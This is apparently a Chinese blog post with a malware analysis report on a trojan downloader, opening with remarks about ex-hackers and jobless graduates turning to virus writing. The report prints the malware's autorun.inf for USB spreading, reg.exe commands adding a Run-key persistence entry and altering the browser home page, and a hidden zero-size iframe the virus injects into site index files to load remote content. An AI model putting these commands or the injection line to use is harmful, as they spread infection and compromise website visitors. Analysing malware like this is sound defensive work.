这年头，做个守法公民真不容易，昨天有个曾经做过“黑客”的朋友做的网站被DDoS了，他打算重操旧业。为非作歹的程序员也层出不穷，下面这个是昨天那个牛×下载者生成器生成的网马分析报告。那个下载器本身毒霸也可以杀。

　　又到大学生找工作的时候了，不晓得会有多少学生因就业问题，走到病毒开发者的队伍中去。

　　这是一个木马下载病毒，该病毒会删除被感染机器上的ghost备份文件，并且尝试感染脚本文件，尝试通过U盘传播把病毒本身传播出去。链接指定网址，下载其他木马程序。

　　1.%system%\SVSH0ST.EXE
%system%\Autorun.inf

　　1.病毒把本身拷贝到每个盘符下面并且命名为来lcg.exe，并且创建autorun.inf文件，内容如下：

　　[AutoRun]

　　open=lcg.exe
shell\open=打开(&O)
shell\open\Command=lcg.exe
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=lcg.EXE

　　2.创建互斥量"niux"

　　3.运行创建进程运行下面的命令：

　　reg.exe
"ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V svchost /T REG_SZ /D "
"ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V svchost /T REG_SZ /D
C:\\WINNT\\System32\\SVSH0ST.EXE /F"
"add \"HKCU\\Software\\Microsoft\\Internet Explorer\\Main\" /v \"Start Page\" /t
REG_EXPAND_SZ /d /f"
"add \"HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\" /v
\"HomePage\" /t REG_DWORD /d 00000001 /f"

　　4.枚举所有当前窗口，如果发现窗口信息中含有以下字符，就关闭该窗口：

　　"病毒"

　　5.遍历所有的盘符，如果文件后缀名为.GHO文件(ghost备份文件)，则删除该文件，如果文件名中含有以下的

　　INDEX.ASP
.HTM
INDEX.PHP
DEFAULT.ASP
DEFAULT.PHP
CONN.ASP

　　之一的责尝试在文件末尾插入代码：

　　<ｉｆｒａｍｅ src=http://*/test.htm width=0 height=0><　/　ｉｆｒａｍｅ　>